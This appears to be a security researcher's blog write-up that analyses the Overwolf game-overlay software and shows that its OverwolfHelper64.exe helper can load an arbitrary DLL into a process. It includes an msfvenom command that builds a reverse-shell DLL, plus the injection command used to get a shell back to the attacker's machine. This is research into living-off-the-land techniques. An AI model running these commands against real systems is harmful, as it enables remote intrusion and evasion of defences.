OverWolfHelperx64 - DLL Injection LOLBAS
Hello guys gals and non binary pals, today we’re going to be looking at a program called OverWolf. Overwolf is a piece of software backed by Curse Forge, Intel, Logitech, Twitch, Ubisoft and a bunch of other companies that is designed to add extensions (or Mods) onto games. Some examples might include an overlay that shows your health or ammo count in a different style. But yeah – you get the gist of it. It’s a pretty interesting piece of software to analyze.
We’re going to be using a pretty standard setup of ProcMon from SysInternals and ProcessHacker.
Overwolf can be downloaded from the following URL: (https://www.overwolf.com/apps/)[https://www.overwolf.com/apps/]
It’s a pretty standard install, so I’m not going to into too much detail on the install process. Just keep clicking “Next” until you see OverWolf finish installing.
First we’re going to open up ProcMon, and add a Process Filter – we will be filtering on the Command Line and ensure it contains the string Overwolf. This will likely give us the best results.
Afterwards, click “Add” and “Apply”. Next up, pop on open Process Hacker and use the “Search” function to specify Overwolf. I’ve split my screens for ease of use:
Next, we’re going to launch Overwolf and see what happens.
If setup correctly, we should see a lot of new processes spawn in Process Hacker and ProcMon should see a whole bunch of new WindowsAPI functions get called as well as Programs get launched.
The Process Hacker window was fairly standard – there was one important thing to note, the Updater spawned as NT AUTHORITY\SYSTEM. This is a very important thing to note if you’re developing a Local Privilege Escalation exploit. If you capture the traffic with Wireshark and can decipher the upgrade protocol, you might be able to develop a LPE exploit. I’m not going to dig through that rabbit hole today though :).
Here, we are primarily looking for DLLs or Programs that get loaded as part of launching OverWolf. Just browsing through the running processes, one in particular stood out to me, OverWolfHelper/OverWolfHelper64.exe, it queried information on a process name “Audiodg.exe”, a native windows binary. I found this particular one in ProcMon, however, it’s also possible to locate it over in Process Hacker.
Located in ProcMon
Located In Process Hacker
Interestingly enough it appears like OverwolfHelper takes two arguments – path and pid. These (to me) are some pretrty interesting arguments to take, especially when the path is pointing to a DLL.
"C:\Program Files (x86)\Common Files\Overwolf\0.178.0.16\OverwolfHelper64.exe" "path=C:\Program Files (x86)\Overwolf\0.178.0.16\OWExplorerLauncher.dll pid=1596"
Doing some basic analysis on this, we can see that the PID actually points to the parent Overwolf process. Interestingly enough, it (OWExplorerLauncher.dll) doesn’t appear to be loaded. However, in OverwolfHelper.exe it does.
Injecting a DLL
Let’s try injecting a DLL with OverWolfHelper and see how it goes. On Kali, we’re going to generate a DLL using MSFVenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f dll -o injectme.dll
After transporting the binary over, we’re going to run the modified command:
"C:\Program Files (x86)\Common Files\Overwolf\0.178.0.16\OverwolfHelper64.exe" "path=C:\Users\Administrator\Downloads\injectme.dll pid=1596"
And checking over in our Terminal, it appears we have gotten a shell!
To figure out what’s going on behind the scenes, we can pivot back over to ProcessHacker and go over to the “Network” tab and filter for our IP Address (192.168.0.198). It appears that it indirectly calls rundll32.exe
It appears that rundll32.exe spawned a child process, cmd.exe which would likely be a fairly large indicator of malware. I’ve created a directory called “notmalware” in my Netcat session and CD’d into that folder
It appears that the child process is indeed our Reverse Shell.
It appears that OverwolfHelper (when it loads a DLL) runs rundll32 – interestingly, our DLL isn’t mentioned as any argument.